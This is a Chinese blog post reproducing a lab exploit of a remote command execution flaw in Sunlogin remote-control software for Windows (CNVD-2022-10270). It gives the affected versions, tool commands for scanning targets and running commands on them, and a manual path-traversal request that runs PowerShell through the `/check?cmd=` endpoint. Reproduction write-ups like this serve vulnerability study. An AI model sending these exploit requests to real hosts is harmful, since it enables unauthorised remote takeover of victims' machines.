向日葵命令执行漏洞复现(CNVD-2022-10270)
向日葵简约版漏洞地址:https://www.cnvd.org.cn/flaw/show/CNVD-2022-03672
向日葵个人版for Windows:https://www.cnvd.org.cn/flaw/show/CNVD-2022-10270
影响版本
向日葵个人版for Windows <= 11.0.0.33
向日葵简约版 <= V1.0.1.43315 (2021.12)
环境
环境我用的是10.3.0.27372版本下载地址:https://wwi.lanzouy.com/irKi301jjype
检测与利用工具:https://github.com/Mr-xn/sunlogin_rce/releases/tag/new
解压赠予执行权限
![]()
漏洞复现
工具使用说明
1 | zss@zss>>> ./xrkRce |
目标扫描
1 | ./xrkRce -h 192.168.0.107 -t scan |
代码执行
1 | ./xrkRce -h 192.168.0.107 -t rce -p 49180 -c "ipconfig" |
![]()
手动
浏览器访问以下地址,获取其Cookie值
url:http://ip:端口/cgi-bin/rpc?action=verify-haras
![]()
访问以下地址并使用BP抓包在其添加上Cookie信息,进行漏洞验证
1 | http://192.168.50.223:49843/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+%20whoami |
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 ZSSのW啥都学!






